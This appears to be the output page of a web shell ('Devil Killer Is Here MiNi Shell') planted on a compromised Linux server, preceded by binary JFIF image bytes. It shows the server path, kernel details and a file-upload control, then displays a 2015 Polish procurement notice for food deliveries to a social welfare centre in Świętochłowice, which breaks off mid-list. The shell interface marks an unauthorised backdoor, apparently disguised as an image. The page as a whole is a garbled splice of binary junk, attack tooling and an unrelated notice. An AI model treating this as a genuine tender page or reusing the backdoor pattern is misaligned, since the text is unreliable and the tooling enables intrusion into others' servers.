JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/333018-N-2015.html

<p class="kh_header"><b>Świętochłowice: Dostawa artykułów żywnościowych dla Ośrodka pomocy społecznej
 w Świętochłowicach w podziale na siedem pakietów</b><br>
<b>Numer ogłoszenia: 333018 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.swietochlowice.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Ośrodka pomocy społecznej
 w Świętochłowicach w podziale na siedem pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świętochłowicach,w podziale na 7 pakietów, wraz z rozładunkiem  w  magazynach  Jadłodajni przy ul. Imieli 12.
2. Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela artykułów w zakresie każdego z 7 pakietów. Ilości artykułów podane w tabelach
posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3. Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub
w innym terminie uzgodnionym z Zamawiającym, w dni powszednie codziennie od poniedziałku do soboty w  godzinach od 07:00 do 10:00. 
4. Wykonawca zobowiązany będzie do bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne oraz rozładunku wraz z wniesieniem do magazynów określonych
 w ust. 1 niniejszego paragrafu. 
5. Wykonawca  zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni oraz
w godzinach wyznaczonych przez Zamawiającego.
6. Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, z okresami ważności
odpowiednimi dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7. Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi
przepisami,  oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin
przydatności do spożycia.(po podpisaniu umowy wymagane będzie dostarczenie karty
produktu, zgodnie  z obowiązującymi przepisami unijnymi w tym zakresie).
8. Zamawiający po stwierdzeniu niezgodności ilościowych albo wad jakościowych w momencie dostawy, odmówi przyjęcia zakwestionowanej partii towaru i zażąda wymiany na wolny od wad  i zgodny ilościowo z pierwotnym zamówieniem w terminie  do trzech godzin od chwili
stwierdzenia nieprawidłowości w dostawie. W takim przypadku Zamawiający nie będzie
wszczynał procedury reklamacyjnej. Zamienna partia towaru podlega odbiorowi ilościowemu
i jakościowemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.55.50.00-8, 15.11.20.00-6, 15.30.00.00-1, 15.11.96.00-1, 03.14.25.00-3, 15.89.60.00-5, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w zakresie :
- urzędowej zmiany stawki podatku VAT o różnicę wynikającą z jej dotychczasowej wielkości
a wprowadzoną zmianą,
- w przypadku zmian przepisów ogólnie obowiązujących, które mają wpływ na treść umowy,
- w przypadku obniżenia cen producenta  lab zastosowania promocyjnej obniżki cen, Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umowa po cenach odpowiednio obniżonych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.swietochlowice.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1. 
Belriso - ryż na mleku 180 g
różne smaki, Zott lub równoważne 
szt.
800


2. 
Deser Jogutek   115   g
 Zott lub równoważne
szt.
800


3. 
Jogurt Jogobella 150 g - 
lub równoważne, różne smaki
szt.
1000


4. 
Jogurt naturalny 190 g
Zott, Bakoma, Danone
lub równoważne
szt.
401


5. 
Jogurt grecki naturalny - 400 ml
Bakoma lub równoważne 
szt.
20


6. 
Deser - kaszka manna - 130 g
Smakija lub równoważne
szt.
400


7. 
Kefir - kubek 250g
Krasnystaw lub równoważne
szt.
 1200


8. 
Majonez 310 ml-
Kielecki, Winiary lub równoważne 
szt.
200


9. 
Majonez 500 ml-
Kielecki,Winiary  lub równoważne 
szt.
96


10. 
Margaryna mleczna 250g
z Kruszwicy lub równoważne 
szt.
1000


11. 
Margaryna 500 g -
Delma, Smakowita lub równoważne 
szt.
300


12. 
Masło Extra 200g - 82 %
szt.
5100


13. 
Maślanka karton 1 l
Mrągowska lub równoważne 
szt.
100


14. 
Mleko 2% folia 0,9 l
Lacpol lub równoważne 
szt.
6250


15. 
Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 
szt.
208


16. 
Mleko zagęszczone niesłodzone  500 g, -Gostyń lub równoważne 
szt.
29


17. 
Mleko w proszku 0,5 kg
Łaciate, Mlekovita lub równoważne 
szt.
  5 


18. 
Ser biały półtłusty - wiaderka 1 kg, Łowicki, Krasnystaw lub równoważne 

szt.
52


19. 
Ser biały półtłusty -
Piątnica, Figard lub równoważne 
kg
500


20. 
Ser domowy z kminkiem 
kg
70


21. 
Ser camembert 120 g
Turek, Preisident lub równoważne 
szt.
450


22. 
Ser feta sałatkowy 270 g 
Mlekovita, Piątnica lub równoważne 
szt.
100


23. 
Ser mascarpone  500 g
szt.
30


24. 
Serek Bakuś- różne smaki 150g  Danio lub równoważne
szt.
300


25. 
Ser biały w kubku - 140 g
Turek, Mlekpol lub równoważne 
szt.
300


26. 
Serek topiony w plastrach - 150 g
Hochland lub równoważne 
szt.
300


27. 
Serki topione 50 g - różne smaki 
szt.
3000


28. 
Sery żółte - Gouda, Podlaski, Morski  lub równoważne
kg
360


29. 
Ser żółty wędzony - różne
kg
14


30. 
Ser żółty w plastrach - 150 g
Edamski, Gouda lub równoważne 
szt.
484


31. 
Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 
szt.
250


32. 
Śmietana 36% - karton 500 g
Łowicka lub równoważne 
szt.
30


33. 
Śmietana 30 % - folia 0,25 l
szt.
580


34. 
Śmietanki jednorazowe 10 g x10 
Zott lub równoważne 
szt.
250



RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 
Ćwiartka z kurczaka ( udka)
kg
300


2. 
Filet z indyka
kg
 10


3. 
Filet z kurczaka
kg
100


4. 
Gulasz drobiowy
kg
100


5. 
Gulasz z indyka
kg
150


6. 
Kurczak świeży
kg
400


7. 
Pałki z kurczaka 
kg
 150


8. 
Porcje rosołowe z kurczaka
kg
 80


9. 
Serca
kg
20


10. 
Udziec z indyka
kg
20


11. 
Wątróbka drobiowa 
z kurczaka
kg
 80


12. 
Żołądki
kg
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1.
Botwinka 
( min. 3 sztuki w pęczku)
pęczek
120


2.
Brzoskwinia 
kg
40


3.
Burak czerwony
kg
       600


4.
Cebula
kg
400


5.
Czosnek
kg
50


6.
Jabłko
kg
450


7.
Kalafior świeży (nie mniejszy niż 15 cm średnicy)
szt.
200


8.
Kalarepa
( min. 3 sztuki w pęczku)
pęczek
150


9.
Kapusta biała
kg
       800


10.
Kapusta czerwona
kg
200


11.
Kapusta pekińska
szt.
100


12.
Kapusta włoska
kg
100


13.
Koperek zielony
pęczek
500


14.
Marchew
kg
500


15.
Nektarynka
kg
30


16.
Ogórek zielony
kg
135


17.
Papryka czerwona
kg
30


18.
Papryka żółta
kg
10


19
Papryka zielona
kg
10


20
Pieczarka
kg
550


21
Pietruszka korzeń
kg
40


22
Pietruszka zielona
pęczek
300


23
Pomidory
kg
200


24
Pomidorki koktajlowe 
kg 
5


25
Por
kg
 10


26
Rzepa biała
kg
 10


27
Rzodkiewka
pęczek
50


28
Sałata zielona
szt.
50


29
Seler korzeń
kg
150


30
Szczypiorek
pęczek
100


31
Szpinak świeży
kg
 100


32
Śliwka
kg
30


33
Winogrona białe
kg
40


34
Truskawka
kg
 40


35
Ziemniak stary 
( do 14.06.2016.)
kg
10000


36
Ziemniak nowy ( od 15.06.- nie mniejszy niż 5- 6 cm średnicy)
kg
2600


37
Ananas
szt
25


38
Banan
kg
150


39
Cytryna
kg
10


40
Grejfrut
kg
15


41
Kapusta kiszona
kg
600


42
Kiwi
szt.
100


43
Mandarynka
kg
120


44
Pomarańcza
kg
250


45
Ogórek kiszony
kg
500



RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatnosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1. 
Aronia 
( w paczkach ok. 2,5 kg)
kg
10


2. 
Bukiet jarzyn 6-mix
( w paczkach ok. 2,5 kg)
kg
300


3. 
Czarna porzeczka 
( w paczkach ok. 2,5 kg)
kg
300


4. 
Fasolka szparagowa
( w paczkach ok. 2,5 kg)
kg
200


5. 
Groszek zielony
( w paczkach ok. 2,5 kg)
kg
10


6. 
Kalafior mrożony
( w paczkach ok.. 2,5 kg)
kg
40


7. 
Lody na patyku - różne smaki - 110 ml
szt.
80


8. 
Lody - opak 1 kg 
kg
5


9. 
Marchew mrożona 
( w paczkach ok. 2,5 kg)
kg
 20


10. 
Mieszanka owocowa
( w paczkach ok. 2,5 kg)
kg
100


11. 
Pierogi z serem  
( w paczkach 1 kg)
kg
 20


12. 
Pierogi z owocami
( w paczkach 1 kg)
kg
 20


13. 
Szpinak brykiety
( w paczkach ok. 2,5 kg)
kg
200


14. 
Truskawka
( w paczkach ok. 2,5  kg)
kg
 20


15. 
Wiśnia bez pestek
( w paczkach ok. 2,5 kg)
kg
 5


16. 
Włoszczyzna paski wieloskładnikowa 
( w paczkach ok. 2,5 kg)
kg
 3500



RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1. 
Filet śledziowy w śmietanie 300g
Lisner lub równoważne 
szt
200


2. 
Filet z  czerniaka 
 (jednokrotnie glazurowany)
kg
100


3. 
Filet z makreli w oleju - 170 g
Lisner, Natica, Super fisch
 lub równoważne 
szt
300


4. 
Filet z makreli w pomidorach 170g, Lisner, Natica, Super fisch  lub równoważne 
szt
300


5. 
Filet z mintaja 
(jednokrotnie glazurowany)
kg
 25


6. 
Filet z  pangi
 (jednokrotnie glazurowany)
kg
200


7. 
Filet z zielonego śledzia (jednokrotnie glazurowany)
kg
100


8. 
Łosoś wędzony
kg
2


9. 
Makrela wędzona 
kg
80


10. 
Paprykarz szczeciński 135g
Dega, Grall, BMC 
lub równoważne 
szt
500


11. 
Pasta 80g z tuńczyka, makreli
Pastella lub równoważne
szt
300


12. 
Pasta z łososia 125g- tuba
szt
5


13. 
Pasta z tuńczyka  125g- tuba
szt
5


14. 
Sałatka warzywna ze śledziem, 
kurczakiem, boczkiem 150g
Lisner lub równoważne 
szt
200


15. 
Śledzik na raz 100 g- różne smaki, Lisner lub równoważne 
szt
200


16. 
Śledź matjas  (lekko solony)
kg
      150



RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.96.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1. 
Jaja kurze-
 klasa- wagowa M,
 klasa jakości A
szt.
20000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa pozostałych artykułów żywnościowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ASORTYMENT 
